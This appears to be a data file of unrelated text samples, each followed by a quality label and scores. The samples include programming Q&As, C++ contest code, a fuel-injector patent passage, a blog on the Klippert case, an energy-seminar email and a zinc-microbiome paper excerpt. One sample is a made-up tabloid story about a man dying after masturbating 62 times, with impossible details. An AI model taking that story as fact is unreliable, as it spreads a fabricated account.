Q: Rails 3: Link_to :remote => true with JQuery? Question update: I have figured out that importing JQuery (even without using it at all) is causing :remote => true to not work properly. I get the following error in the Chrome console: Uncaught TypeError: Object [object Object] has no method 'dispatchEvent' (prototype.js:5653) And when the link is clicked, it throws the same error again before redirecting. Responder.erb.html <ul> <% @choices.each_with_index do |choice, index| %> <li><%= link_to choice, { :action => "submit_response", :id => @id, :response => index }, :remote => true %></li> <% end %> </ul> Example generated HTML: <ul> <li><a href="/poller/submit_response/yni?response=0" data-remote="true">True</a></li> <li><a href="/poller/submit_response/yni?response=1" data-remote="true">False</a></li> </ul> A: Since Dave never formally answered this question, the answer is: "If you're trying to run both jQuery and Prototype in the same app, the load order of the libraries matters, or you must use noConflict." – Dᴀᴠᴇ Nᴇᴡᴛᴏɴ | High | [
0.6701846965699201,
31.75,
15.625
] |
Man Dies Of Heart Attack After Masturbating 62 Times On St. Valentine’s Day David Mabuza, a 33-year-old South African man, has reportedly died of heart attack after masturbating 62 times in a row on St. Valentine’s Day. Mabuza, who lived with his parents, was found dead in his bedroom after masturbating way too much. It is speculated that he was suffering from depression due to being “extremely lonely”. David’s Mother called security officials after discovering his corpse in his room on St. Valentine’s Day. According to what David’s mother told Nusa reporters “1 hour passed since I had called him out for lunch. David was the kind of boy to steal food off your plate when you were not looking, I knew something was wrong when he didn’t come out to eat, he was a great kid” she said. Police arrived at the home about an hour after Mabuza called them on St. Valentine’s Day. Officer Ronny Mkhize told Nusa reporters what they saw when they opened David’s bedroom door. “The young man was on his bed… his pen*s was detached from his body, it must have been so intense it just came off his body, we found his pen*s gripped in his left hand so tightly we couldn’t get it out, it was tragic”. Investigators are still investigating the case for more information, Mabuza’s funeral will take place sometime next week. | Low | [
0.41250000000000003,
24.75,
35.25
] |
Q: Where to put small subclass of NSObject, separate .h file? This is probably a dumb question, but I'm new to programming and was wondering what ppl typically do. Typically I use separate .h and .m files for all my classes. I have a small class that just has a few properties on it that is a subclass of NSObject. I use this class just to populate a UITableView. I see that when I put it all in one of the related .m files, no one can see it unless I include the .m which I don't want to do because of a circular reference. So do I just put it in the .h file? Or do ppl always put it in separate .h and .m file for each class? Thanks. A: Just put in the .h file, unless you want the class to be private ( or certain parts of it ). A good way of hiding stuff from other classes is by defining a category inside the .m file. | Mid | [
0.6370370370370371,
32.25,
18.375
] |
Before the Republican National Convention in Cleveland Heights, Ohio, pastor Darrell Scott’s sermon came strait from II Corinthians. As pastor Scott departed from the Bible with blinding speed, and words after words flew from his mouth, the organist played in the background in his recently built New Spirit Revival Church. “You are more than your house-ah!” he said. “You are more than your job-ah! You are more than your career-ah! You are more than your clothes-ah!” Pastor Scott is a Donald Trump supporter and had previously introduced Candidate Trump at Ohio rallies as he gathered his peers to meet him in NY. With Donald Trump being Scott’s first endorsement, it placed him in green rooms and in arenas full of screaming Republican voters. Scott has retold his story of how he and Donald Trump met when he was invited to the Trump Tower in 2011, when Trump was first thinking about running for president. Scott found a prayerful Christian who would fight with him to defend his community and faith. “Christianity gets a bad break,” he said, recalling how Trump agreed with him. “We’re presented as being bigoted, narrow-minded people, and there seems to be no anger over this. When we oppose transgender bathrooms and same-sex marriage, we’re portrayed as the enemy.” When Trump began running for president, Pastor Scott became his advocate. Throughout his candidacy and presidency, some have maintained that Donald Trump is a racist. Darrell Scott, a prominent black pastor and strong supporter of the president, says this is simply not the case. Scott has weekly meetings with White House chief of staff John Kelly regarding minority housing programs. Stuart Varney of Fox News didn’t waste any time getting into the meat of the matter, “Why is Maxine Waters saying this kind of thing?” Scott replied, “This race card that the Democratic Party keeps playing is getting played out. It’s about as worn out as a deck of cards in the penitentiary. No matter what the president does. No matter what the president says, they’re going to try to play the race card when they don’t have anything else.” He then goes on to liken Waters to the “drunk aunt” in a family: “She talked about the president … [not] behaving presidentially; she needs to act and behave congressionally. You know you have what they call the drunk uncle? She acts like the crazy aunt that’s just rambling and babbling incessantly over every little thing, and her act is becoming very, very stale.” He added that Waters needs to be more careful with how she speaks publicly because there are plenty of other people who are ready to take her seat. | Mid | [
0.5807962529274,
31,
22.375
] |
/* ID: bqi3431 PROG: gourmet LANG: C++11 */ #pragma GCC optimize ("O3") #pragma GCC target ("sse4") #include <bits/stdc++.h> #include <ext/pb_ds/tree_policy.hpp> #include <ext/pb_ds/assoc_container.hpp> #include <ext/rope> using namespace std; using namespace __gnu_pbds; using namespace __gnu_cxx; typedef long long ll; typedef long double ld; typedef complex<ld> cd; typedef pair<int, int> pi; typedef pair<ll,ll> pl; typedef pair<ld,ld> pd; typedef vector<int> vi; typedef vector<ld> vd; typedef vector<ll> vl; typedef vector<pi> vpi; typedef vector<pl> vpl; typedef vector<cd> vcd; template <class T> using Tree = tree<T, null_type, less<T>, rb_tree_tag,tree_order_statistics_node_update>; #define FOR(i, a, b) for (int i = (a); i < (b); i++) #define F0R(i, a) for (int i = 0; i < (a); i++) #define FORd(i,a,b) for (int i = (b)-1; i >= (a); i--) #define F0Rd(i,a) for (int i = (a)-1; i >= 0; i--) #define trav(a, x) for (auto& a : x) #define mp make_pair #define pb push_back #define f first #define s second #define lb lower_bound #define ub upper_bound #define sz(x) (int)x.size() #define beg(x) x.begin() #define en(x) x.end() #define all(x) beg(x), en(x) #define resz resize const int MOD = 1000000007; const ll INF = 1e18; const int MX = 100001; const ld PI = 4*atan((ld)1); template<class T> void ckmin(T &a, T b) { a = min(a, b); } template<class T> void ckmax(T &a, T b) { a = max(a, b); } namespace io { // TYPE ID (StackOverflow) template<class T> struct like_array : is_array<T>{}; template<class T, size_t N> struct like_array<array<T,N>> : true_type{}; template<class T> struct like_array<vector<T>> : true_type{}; template<class T> bool is_like_array(const T& a) { return like_array<T>::value; } // I/O void setIn(string s) { freopen(s.c_str(),"r",stdin); } void setOut(string s) { freopen(s.c_str(),"w",stdout); } void setIO(string s = "") { ios_base::sync_with_stdio(0); cin.tie(0); if (sz(s)) { setIn(s+".in"), setOut(s+".out"); } } // INPUT template<class T> void re(T& x) { cin >> x; } template<class Arg, class... Args> void re(Arg& first, Args&... rest); void re(double& x) { string t; re(t); x = stod(t); } void re(ld& x) { string t; re(t); x = stold(t); } template<class T> void re(complex<T>& x); template<class T1, class T2> void re(pair<T1,T2>& p); template<class T> void re(vector<T>& a); template<class T, size_t SZ> void re(array<T,SZ>& a); template<class Arg, class... Args> void re(Arg& first, Args&... rest) { re(first); re(rest...); } template<class T> void re(complex<T>& x) { T a,b; re(a,b); x = cd(a,b); } template<class T1, class T2> void re(pair<T1,T2>& p) { re(p.f,p.s); } template<class T> void re(vector<T>& a) { F0R(i,sz(a)) re(a[i]); } template<class T, size_t SZ> void re(array<T,SZ>& a) { F0R(i,SZ) re(a[i]); } // OUTPUT template<class T1, class T2> ostream& operator<<(ostream& os, const pair<T1,T2>& a) { os << '{' << a.f << ", " << a.s << '}'; return os; } template<class T> ostream& printArray(ostream& os, const T& a, int SZ) { os << '{'; F0R(i,SZ) { if (i) { os << ", "; if (is_like_array(a[i])) cout << "\n"; } os << a[i]; } os << '}'; return os; } template<class T> ostream& operator<<(ostream& os, const vector<T>& a) { return printArray(os,a,sz(a)); } template<class T, size_t SZ> ostream& operator<<(ostream& os, const array<T,SZ>& a) { return printArray(os,a,SZ); } template<class T> void pr(const T& x) { cout << x << '\n'; } template<class Arg, class... Args> void pr(const Arg& first, const Args&... rest) { cout << first << ' '; pr(rest...); } } using namespace io; int N,M; int main() { // you should actually read the stuff at the bottom setIO("gourmet"); re(N,M); vpi v(N); re(v); sort(all(v)); vpi w(M); re(w); sort(all(w)); int ind = 0; multiset<int> z; ll ans = 0; trav(x,w) { while (ind < sz(v) && v[ind].f <= x.f) { z.insert(v[ind++].s); } //pr(x); //trav(t,z) cout << t << " "; //cout << "\n"; auto it = z.ub(x.s); if (it == z.begin()) continue; z.erase(prev(it)); ans += x.f; } if (sz(z)) { pr(-1); exit(0); } pr(ans); // you should actually read the stuff at the bottom } /* stuff you should look for * int overflow, array bounds * special cases (n=1?), set tle * do smth instead of nothing and stay organized */ | Low | [
0.5263157894736841,
26.25,
23.625
] |
It is believed that examples of known fuel injection systems use an injector to dispense a quantity of fuel that is to be combusted in an internal combustion engine. It is also believed that the quantity of fuel that is dispensed is varied in accordance with a number of engine parameters such as engine speed, engine load, engine emissions, etc. It is believed that examples of known electronic fuel injection systems monitor at least one of the engine parameters and electrically operate the injector to dispense the fuel. It is believed that examples of known injectors use electromagnetic coils, piezoelectric elements, or magnetostrictive materials to actuate a valve. It is believed that examples of known valves for injectors include a closure member that is movable with respect to a seat. Fuel flow through the injector it believed to be prohibited when the closure member sealingly contacts the seat, and fuel flow through the injector is believed to be permitted when the closure member is separated from the seat. It is believed that examples of known injectors include a spring providing a force biasing the closure member toward the seat. It is also believed that this biasing force is adjustable in order to set the dynamic properties of the closure member movement with respect the seat. It is further believed that examples of known injectors include a filter for separating particles from the fuel flow, and include a seal at a connection of the injector to a fuel source. It is believed that such examples of the known injectors have a number of disadvantages. It is believed that examples of known injectors must be assembled entirely in an environment that is substantially free of contaminants. It is also believed that examples of known injectors can only be tested after final assembly has been completed. | Mid | [
0.627118644067796,
37,
22
] |
You are here rabble blogs are the personal pages of some of Canada's most insightful progressive activists and commentators. All opinions belong to the writer; however, writers are expected to adhere to our guidelines. We welcome new bloggers -- contact us for details. Everett Klippert was represented by Western Canada's first Indigenous lawyer Prime Minister Justin Trudeau's apology to the LGBTQ+ communities has invoked memories of past injustices, particularly the case of Everett George Klippert, who was the only person in Canada ever declared a dangerous sexual offender for homosexuality and sent to prison indefinitely--that is, for life. Klippert's lawyer appealed his case all the way to the Supreme Court, where he lost again. But the court of public opinion led the government of the day to change the law. Often overlooked, on the other hand, is the role that Western Canada's first Indigenous lawyer played throughout the Klippert case. A recent Globe and Mail article stated that Klippert had "little or no legal representation." On the contrary, Klippert's lawyer stayed with his client all the way through and then reached out for legislative help. In the 1960s, William (Bill) Wuttunee had a law practice in Calgary. As his obituary in The Globe and Mail , written by Patricia Dawn Robinson, reported: "He expanded his practice to Yellowknife in 1966 when he took on a major case that became known across the country." That case was Klippert's. "So why was he convicted?" I asked Bill once, as we sat side by side in our pew, waiting for Sunday service to start. Bill was a valued member and former president of our congregation. "Klippert confessed," he said. Picked up for questioning on an arson case he had nothing to do with, Klippert started talking about his gay liaisons. Maclean's reported a current legal view of the case. "'He couldn’t stop confessing,'" says Douglas Elliott, a prominent gay rights lawyer and activist, with a laugh. "'I think you'd have to hold your hand over Everett's mouth to stop him from blabbing.'" The mutual masturbation Klippert described to police in 1966 seems tame compared to, say, modern TV shows like CSI or Criminal Minds. Back then, his narrative was heard as depravity--or at best, a mental illness for which there was no cure. Horrified by the prospect of an indefinite sentence, and rejecting any notion that his client could be a "dangerous sexual offender," Bill pursued the case. "Mr. Wuttunee appealed the case to the Supreme Court of Canada, another first for an Aboriginal lawyer--but the decision was upheld in 1967," Robertson reported. Bill often said that when he heard the Supreme Court decision, he also reached out to Parliament--to Tommy Douglas, with whom he had worked in the 1950s. Bill was called to the Bar in 1954, at the age of 26, "the first Native lawyer in Western Canada," he used to say. As CCF Premier of Saskatchewan from 1944-61, Douglas wanted to offer First Nations a new deal, says Robertson--integration into modern society, while maintaining their special status. So in 1958, Tommy Douglas sent Bill Wuttunee to 58 Saskatchewan reserves to ask what people there wanted. Among other recommendations, Bill found that soldiers wanted to be able to raise a beer in the Legion alongside other men they'd served with. He also lobbied hard for status Indians to win the vote without losing their status. Tommy Douglas agreed on both accounts. I have no doubt he would have listened to Bill about Everett Klippert too, in 1967. Bill was a Cree from the Red Pheasant Reserve in Saskatchewan, raised on a mixed farm by educated parents, before he was forced to attend residential school for several hellish years. Many others in his generation at Red Pheasant also went on to university and professional careers. Bill married twice. He had five children with his first wife, Bernice Dufour: daughters Wanda, Lauren, Nola, and sons Nisha and Peyasu, says Robertson. The couple divorced in 1970. Several years later, Bill and his new partner had another son, Jason. Determined to become a lawyer from the age of 10, Bill dedicated his life to winning self-determination for First Nations people. According to the University of Saskatchewan law school: In 1959, he appeared before the Joint Committee of the House and Senate on Indian Affairs as counsel for the Federation to put forward the idea of First Nations as a third order of government. In 1961, he co-founded the National Indian Council (NIC) and was appointed its first National Chief. The NIC was credited for being the first organization to unite 'the political voice of Aboriginal peoples at a national level.' Today, it is known as the Assembly of First Nations....Wuttunee was also the first native lawyer to appear before the Supreme Court of Canada. Other significant achievements throughout his distinguished career include: authoring the controversial book, Ruffled Feathers: Indians in Canadian Society in 1971; sitting on the Oversight Committees for the Truth and Reconciliation Commission and the organization overseeing the thousands of residential school claims from 2007 to 2010; and, receiving an apology from Pope Benedict at the Vatican for the harms 'perpetrated against native children in residential schools. William Wuttunee died on October 31, 2015 at the age of 87, surrounded by his family. His defence of George Everett Klippert turned out to be a national turning point. And to me at least, Klippert's case has even more resonance because it was an early indication of how significant Bill Wuttunee’s life would turn out to be. More people are reading rabble.ca than ever and unlike many news organizations, we have never put up a paywall – at rabble we’ve always believed in making our reporting and analysis free to all. But media isn’t free to produce. rabble’s total budget is likely less than what big corporate media spend on photocopying (we kid you not!) and we do not have any major foundation, sponsor or angel investor. Our only supporters are people and organizations -- like you. This is why we need your help. If everyone who visits rabble and likes it chipped in a couple of dollars per month, our future would be much more secure and we could do much more: like the things our readers tell us they want to see more of: more staff reporters and more work to complete the upgrade of our website. We’re asking if you could make a donation, right now, to set rabble on solid footing. | Mid | [
0.6082474226804121,
29.5,
19
] |
mary and Tana, FYI.................Tony ---------------------- Forwarded by Tony Pryor/ET&S/Enron on 08/30/2000 10:04 AM --------------------------- "Reece, Lin" <[email protected]> on 08/28/2000 11:48:50 AM To: "'[email protected]'" <[email protected]> cc: Subject: OTC DERIVATIVES CONTRACTS (ISDA) SEMINAR -- OCTOBER 23 & 24, 2000 Greetings fellow ISDA contract professionals! Have you had difficulty finding available training on derivatives contracts and the ISDA Master Agreement and Credit Support Annex? Southern Company Energy Marketing L.P. will be hosting a seminar: "OTC Derivatives Contracts: What Every Energy Professional Should Know!" This seminar will be presented in Atlanta, GA on October 23 & 24 by the dynamic and knowledgeable Ann O'Hara, Esq. Please click on the attachment to find a registration form, information about the speaker, and the seminar content. <<ISDA SEMINAR BROCHURE.doc>> We are limiting the size of the seminar to the first 50 registrants, so sign up now! Please pass this message on to others you know who work with ISDA contracts and may be interested in attending. P.S. The fall foliage should be at its peak and the hotel is offering a special weekend rate! See you in October! Lin Reece Sr. Contract Analyst Southern Company Energy Marketing L.P. 678-579-3378 Phone - ISDA SEMINAR BROCHURE.doc | Mid | [
0.645,
32.25,
17.75
] |
I would like to swap 2 bundles of Russian Hair 22-24 for some good quality Indian curly 14-16 inches ..I want to try some curly hair I've been wearing wavy long hair for a while ..I can email you my pic if interested.. You cannot post new topics in this forumYou cannot reply to topics in this forumYou cannot delete your posts in this forumYou cannot edit your posts in this forumYou cannot create polls in this forumYou cannot vote in polls in this forum | Low | [
0.49024390243902405,
25.125,
26.125
] |
1. Introduction {#sec1-nutrients-07-05497} =============== Zn, an essential nutrient for nearly all organisms, is most notably involved as a metal cofactor in hundreds of proteins within the human body \[[@B1-nutrients-07-05497],[@B2-nutrients-07-05497]\]. In healthy adults, Zn is present in the amount of 2--3 g and is second only to iron (Fe) as the most abundant micronutrient \[[@B3-nutrients-07-05497],[@B4-nutrients-07-05497]\]. Even mild deficiencies of this mineral can profoundly impact growth and development, as well as impede immune differentiation and maturation \[[@B5-nutrients-07-05497],[@B6-nutrients-07-05497]\]. The spectrum of chronic Zn deficiencies has been recently estimated to affect around 17% of the population \[[@B7-nutrients-07-05497]\], with insufficient dietary Zn intake and/or poor bioavailability from food central to this condition \[[@B8-nutrients-07-05497],[@B9-nutrients-07-05497]\]. Despite the high prevalence of Zn deficiency, accurate clinical biomarkers of Zn status are lacking \[[@B10-nutrients-07-05497],[@B11-nutrients-07-05497]\]. To address this, a major initiative set forth by the World Health Organization, the International Zinc Nutrition Consultative Group, and others has been to promote the development of reliable Zn biomarkers. Although serum Zn is currently the most widely used biomarker of Zn status, inherent problems with its measurement and interpretation can significantly impact sensitivity and specificity for dietary Zn \[[@B11-nutrients-07-05497]\]. To that end, our group recently published evidence in this journal for a new biological indicator of Zn status, the linoleic acid: dihomo--γ--linolenic acid (LA:DGLA) ratio, which exploits the Zn--dependent rate--limiting step of erythrocyte fatty acid desaturation \[[@B12-nutrients-07-05497]\]. Yet, since no single reliable biomarker of Zn status currently exists, establishing a panel of biochemical indices, as is the case with functional Fe deficiency \[[@B13-nutrients-07-05497],[@B14-nutrients-07-05497]\], may be necessary. Understanding the influence of the gastrointestinal microbiota on physiology may represent a novel area to also understand the effects of Zn deficiency on the host. Little is known about how dietary Zn contributes to the microbiota, and even less is known regarding the effects of chronic Zn deficiency on the gut microbial composition. Early work by Smith *et al.* \[[@B15-nutrients-07-05497]\] elucidated a role of the host microbiota in Zn homeostasis, whereby conventionally-raised (CR, Conventionally-raised) mice required nearly twice as much dietary Zn than did their germ-free (GF) counterparts. In the same study, an *in vitro* assay using radiolabeled ^65^Zn identified a *Streptococcus* sp. and *Staphylococcus epidermidis* able to concentrate Zn from the medium. In this study, GF animals also had a reduced cecal Zn concentration relative to their CR counterparts. Recently, it was shown \[[@B16-nutrients-07-05497]\] that Zn competition exists in *C. jejuni* and other bacterial species in the host microbiota of CR versus GF broiler chickens (*Gallus gallus*). Under conditions of Zn deficiency, this might lead to the preferential growth of bacteria able to survive at low-Zn levels. Further, many recent studies have shown that prophylactic doses of Zn (as Zn oxide, ZnO) in various animal models increased the presence of Gram--negative facultative anaerobic bacterial groups, the colonic concentration of short chain fatty acids (SCFAs), as well as overall species richness and diversity \[[@B17-nutrients-07-05497],[@B18-nutrients-07-05497],[@B19-nutrients-07-05497]\]. Likewise, others have found a gut microbiota enriched in members of the phylum Firmicutes, specifically *Lactobacillus*, following ZnO administration \[[@B20-nutrients-07-05497]\]. Therapeutic levels of dietary Zn have been shown to alter the overall gut microbial composition of piglets leading to favorable changes in its metabolic activity \[[@B21-nutrients-07-05497],[@B22-nutrients-07-05497]\]. Protective effects of Zn supplementation include modulating intestinal permeability (via proliferation of the absorptive mucosa) \[[@B23-nutrients-07-05497],[@B24-nutrients-07-05497]\], reducing villous apoptosis \[[@B25-nutrients-07-05497]\], influencing the Th1 immune response \[[@B26-nutrients-07-05497]\], and reducing pathogenic infections and subsequent diarrheal episodes \[[@B23-nutrients-07-05497]\]. Although the gut environment is central to Zn homeostasis, and is affected by suboptimal Zn status, we know little about the effects of chronic dietary Zn deficiency on the composition and function of the gut microbiome. Therefore, the present study examined how a 4 weeks period of Zn deficiency affected the composition and genetic potential of the cecal microbiota in broiler chickens fed a moderately Zn deficient diet. A panel of Zn status biomarkers was measured weekly, and gene expression of a variety of Zn-dependent proteins was quantified from relevant tissues at study conclusion. Cecal contents were collected for SCFA quantification and for analyzing compositional and functional alterations in the microbiota. 2. Experimental Section {#sec2-nutrients-07-05497} ======================= 2.1. Animals, Diets, and Experimental Design {#sec2dot1-nutrients-07-05497} -------------------------------------------- Upon hatching, chicks were randomly allocated into two treatment groups on the basis of body weight and gender (aimed to ensure equal distribution between groups, *n* = 12): 1. Zn(+): 42 µg/g zinc; 2. Zn(−): 2.5 µg/g zinc. Experimental diets are shown in [Supplemental Table 1](#app1-nutrients-07-05497){ref-type="app"}. At study conclusion, birds were euthanized. The digestive tracts (colon and small intestine) and liver were quickly removed and stored as was previously described \[[@B12-nutrients-07-05497]\]. All animal protocols were approved by the Cornell University Institutional Animal Care and Use committee. 2.2. Determination of Zn Status {#sec2dot2-nutrients-07-05497} ------------------------------- Zn status parameters were determined as described in the [Supplemental Materials](#app1-nutrients-07-05497){ref-type="app"} and Methods. 2.3. Isolation of Total RNA {#sec2dot3-nutrients-07-05497} --------------------------- Total RNA was extracted from 30 mg of duodenal (proximal duodenum, *n* = 9) and liver tissues (*n* = 9) as described in the [Supplemental Materials](#app1-nutrients-07-05497){ref-type="app"} and Methods. [Supplemental Table 2](#app1-nutrients-07-05497){ref-type="app"} shows the measured genes. 2.4. Cecal SCFA Analysis {#sec2dot4-nutrients-07-05497} ------------------------ SCFA concentration was determined as described in the [Supplemental Materials](#app1-nutrients-07-05497){ref-type="app"} and Methods. 2.5. 16S rRNA PCR (Polymerase Chain Reaction) Amplification and Sequencing {#sec2dot5-nutrients-07-05497} -------------------------------------------------------------------------- Microbial genomic DNA was extracted from cecal samples as described in the [Supplemental Materials](#app1-nutrients-07-05497){ref-type="app"} and Methods. 2.6. 16S rRNA Gene Sequence Analysis {#sec2dot6-nutrients-07-05497} ------------------------------------ 16S rRNA analysis was performed as described in the [Supplemental Materials](#app1-nutrients-07-05497){ref-type="app"} and Methods. 2.7. Statistical Analysis {#sec2dot7-nutrients-07-05497} ------------------------- Biomarkers of Zn deficiency ([Figure 1](#nutrients-07-05497-f001){ref-type="fig"}) are presented as means ± SEM. ANOVA was performed to identify significant differences between the means of the experimental groups of birds, unless otherwise stated. Spearman's correlation was used to assess significant associations between bacterial groups and biomarkers of Zn status. False discovery rate adjusted *p*-values were calculated for comparisons of taxa. *p* \< 0.05 was considered significant. All statistical tests were two--tailed and were carried out using SAS version 9.3 (SAS Institute, Cary, NC, USA). {#nutrients-07-05497-f001} 3. Results {#sec3-nutrients-07-05497} ========== 3.1. A Panel of Sensitive Biomarkers Defines a Marked Difference in Zn Status between Treatment Groups {#sec3dot1-nutrients-07-05497} ------------------------------------------------------------------------------------------------------ Results of the Zn status biomarkers used in this study were adapted from our recent publication \[[@B12-nutrients-07-05497]\]. Due to the lack of a singular marker of Zn intake and deficiency \[[@B27-nutrients-07-05497],[@B28-nutrients-07-05497]\], we opted to use an array of biological indicators of Zn status-including growth (bodyweight), immunological (hepatic mRNA expression of cytokines), and physiological (tissue Zn, serum Zn, and the erythrocyte LA:DGLA ratio) parameters- to confirm Zn deficiency in the Zn(−) treatment group. As expected, these indicators ([Figure 1](#nutrients-07-05497-f001){ref-type="fig"}A--F) were significantly different between animals receiving a Zn adequate semi purified diet (\[[@B29-nutrients-07-05497]\]; Zn(+), 42 µg/g Zn) versus those receiving a Zn deficient diet (Zn(−), 2.5 µg/g Zn). Relative hepatic mRNA gene expression of the pro-inflammatory cytokines IL-1β, IL-6, and Th2 dominant TNF-α were significantly reduced in the Zn deficient group, supporting a central role for dietary Zn in the production of cytokines and immunoregulation \[[@B30-nutrients-07-05497],[@B31-nutrients-07-05497],[@B32-nutrients-07-05497]\]. The chronic feeding of a Zn deprived diet resulted in a measureable Zn deficiency in the Zn(−) animals relative to their Zn(+) counterparts. 3.2. Gut Microbial Diversity of Zn Deficient Animals Resembles Physiologically Diseased Microbiomes {#sec3dot2-nutrients-07-05497} --------------------------------------------------------------------------------------------------- Cecal samples from the Zn(+) and Zn(−) treatment groups were harvested and used for bacterial DNA extraction and sequencing of the V4 hypervariable region in the 16S rRNA gene. The cecum represents the primary site of bacterial fermentation in *Gallus gallus*, with its resident microbiota highly diverse and abundant \[[@B33-nutrients-07-05497]\]. As in humans, Firmicutes are by far the dominant bacterial phylum in the *Gallus gallus* cecum, accounting for 70%--90% of all sequences \[[@B34-nutrients-07-05497],[@B35-nutrients-07-05497]\]. The diversity of the cecal microbiota in the Zn(+) and Zn(−) groups was assessed through measures of α--diversity, β--diversity, and overall species richness ([Figure 2](#nutrients-07-05497-f002){ref-type="fig"}). The Chao1 index and observed species richness were used to assess α--diversity. For both measures, the Zn deficient group had significantly lower phylogenetic diversity, indicating a less diverse cecal microbial composition ([Figure 2](#nutrients-07-05497-f002){ref-type="fig"}A,B). We utilized weighted UniFrac distances as a measure of β-diversity to assess the effect of chronic Zn deficiency on between-individual variation in bacterial community composition. Principal coordinate analysis demonstrated a significant expansion of β-diversity in the Zn deficient group ([Figure 2](#nutrients-07-05497-f002){ref-type="fig"}C). Interestingly, the same features of lower α-diversity and richness together with higher β-diversity compared to the control as seen in Zn deficiency are also found in GI microbiota observed during a deficiency of the trace mineral selenium \[[@B36-nutrients-07-05497]\], as well as in various pathological states such as Crohn's disease \[[@B37-nutrients-07-05497]\], inflammatory bowel disease \[[@B38-nutrients-07-05497]\], opportunistic infections \[[@B39-nutrients-07-05497]\], diabetes \[[@B40-nutrients-07-05497]\], obesity \[[@B41-nutrients-07-05497]\] and others \[[@B42-nutrients-07-05497]\]. ![Microbial diversity of the cecal microbiome. (**A**) Measures of α-diversity using the Chao1 Index \[[@B39-nutrients-07-05497]\]; and (**B**) total number of observed species \* *p* \< 0.05, \*\* *p* \< 0.01, ANOVA, *n* = 10 in Zn(+), *n* = 9 in Zn(−); (**C**) Measure of β-diversity using weighted UniFrac distances separated by the first three principal components (PC). Each dot represents one animal, and the colors represent the different treatment groups.](nutrients-07-05497-g002){#nutrients-07-05497-f002} 3.3. Chronic Zn Deficiency Reshapes the Gut Microbiome {#sec3dot3-nutrients-07-05497} ------------------------------------------------------ We performed a taxon-based analysis of the cecal microbiota ([Figure 3](#nutrients-07-05497-f003){ref-type="fig"}). 16S rRNA gene sequencing revealed that 98%--99% of all bacterial sequences in both the Zn(+) and Zn(−) groups belonged to four major divisions: Firmicutes, Proteobacteria, Bacteroidetes, and Actinobacteria. Bacterial community composition was altered in the Zn deficient group, where significantly greater abundance of Proteobacteria and significantly lower abundance of Firmicutes ([Figure 3](#nutrients-07-05497-f003){ref-type="fig"}A) was observed. In the Zn(−) group, the abundance of Bacteroidetes was increased whereas Actinobacteria was diminished, albeit not significantly. As such, the ratio of Firmicutes: Proteobacteria, was significantly lower in the Zn deficient group ([Figure 3](#nutrients-07-05497-f003){ref-type="fig"}B). Further, the abundance of Proteobacteria inversely correlated with bodyweight ([Figure 3](#nutrients-07-05497-f003){ref-type="fig"}C). Because of the central importance of Zn in growth and development, bodyweight is often the first anthropometric measurement to respond to Zn depletion and to quantify risk of complications related to Zn deficiency \[[@B43-nutrients-07-05497]\]. It has been a consistently reliable indicator of low Zn intake and Zn status in multiple cohorts and experimental models, and has been used by numerous others to quantify suboptimal dietary Zn deficiency \[[@B44-nutrients-07-05497],[@B45-nutrients-07-05497]\]. Likewise in this study, final bodyweight strongly correlated with final serum Zn (ρ = 0.84, *p* = 0.0012, [Figure 1](#nutrients-07-05497-f001){ref-type="fig"}G). At the family-level, Peptostreptococcaceae and unclassified Clostridiales were significantly lower, whereas Enterococcaceae and Enterobacteriaceae were significantly enriched, in the Zn deficient group. At the genus-level, we observed that Zn deficient animals had significantly higher relative abundance of *Enterococcus*, unclassified *Enterobacteriaceae*, and unclassified *Ruminococcaceae*, and significantly lower relative abundance of unclassified *Clostridiales* and unclassified *Peptostreptococcaceae* compared with their Zn replete counterparts ([Figure 3](#nutrients-07-05497-f003){ref-type="fig"}D). {#nutrients-07-05497-f003} We next investigated whether taxonomic shifts at the genus level were associated with host phenotype, as defined by bodyweight and serum Zn (as measured on day 28, [Figure 4](#nutrients-07-05497-f004){ref-type="fig"}), two commonly utilized biomarkers of Zn deficiency. Among the Zn replete animals, a significant inverse correlation was obtained between average serum Zn levels and *Eggerthella* abundance. There was also a significant positive correlation between body weight and *Rikenellaceae* abundance in this group. In the Zn deficient group, a significant positive correlation was obtained between bodyweight and the abundance of *Peptostreptococcaceae.* The ratio of certain bacterial groups may be predictive of shifts in the genetic capacity of the microbiome in certain physiological processes (e.g., the Firmicutes:Bacteroidetes ratio and caloric extraction from diet \[[@B46-nutrients-07-05497]\]. Studies have yet to characterize or relate taxonomic changes induced by dietary Zn deficiency to markers of the phenotype, yet such ratio analyses may further define a cecal microbiota signature of the deficiency. Our analysis revealed that several ratios of the significantly altered genera in the Zn(−) group were also significantly different during Zn deficiency. The ratios of the relative abundance of Unclassified *Clostridiales*:*Enterococcus* (UC:E), Unclassified *Clostridiales*:*Ruminococcaceae* (UC:R), Unclassified *Clostridiales*:Unclassified *Enterobacteriaceae* (UC:UE), and *Peptostreptococcaceae*:*Enteroccocus* (P:E) were significantly different between the Zn(+) and Zn(−) treatment groups ([Figure 4](#nutrients-07-05497-f004){ref-type="fig"}B). Additionally, there was a significant, treatment--specific correlation between one of these ratios, *Peptostreptococcaceae*:*Enterococcus*, and bodyweight in the Zn deficient group ([Figure 4](#nutrients-07-05497-f004){ref-type="fig"}C). {#nutrients-07-05497-f004} In light of these taxonomic alterations, we further analyzed community shifts to the species-level. We identified a strong positive correlation between *Ruminococcus lactaris*, *Enterococcus* sp., *Clostridium lactatifermentans*, and *Clostridium clostridioforme* and Zn adequacy, as well as between the latter three operational taxonomic units (OTUs) and final bodyweight and serum Zn measurements ([Figure 5](#nutrients-07-05497-f005){ref-type="fig"}). The levels of two additional bacterial species, *Clostridium indolis* and an unclassified member of the Bacteroidales (*Unclassified S24*--*7*), were inversely correlated with final bodyweight and dietary Zn adequacy. Although not significant, it is interesting that the trend in correlation presented in [Figure 5](#nutrients-07-05497-f005){ref-type="fig"} (*i.e.*, positive OTU correlation with *Ruminococcus lactaris*, *Enterococcus* sp., *Clostridium lactatifermentans*, and *Clostridium clostridioforme* and negative OTU correlation with *Unclassified S24*--*7 and Clostridium indolis)* does extend to the mRNA gene expression data. {#nutrients-07-05497-f005} 3.4. Functional Alterations in the Genetic Capacity of Cecal Microbiota under Zn Deficiency Conditions {#sec3dot4-nutrients-07-05497} ------------------------------------------------------------------------------------------------------ We next sought to understand whether the genetic capacity of the microbiota may influence host Zn status, since there were significant community shifts associated with physiological markers of Zn deficiency. The study of metagenomic alterations among various phenotypes (e.g., inflammatory bowel disease, obesity) and between healthy and diseased subjects has helped to elucidate how the functional shifts of the microbiota may affect the trajectory of the disease process \[[@B47-nutrients-07-05497]\]. However, the medical significance of alterations in the metabolic or functional capacity of the host microbiome under Zn deficiency conditions is unknown. Metagenome functional predictive analysis was carried out using PICRUSt software 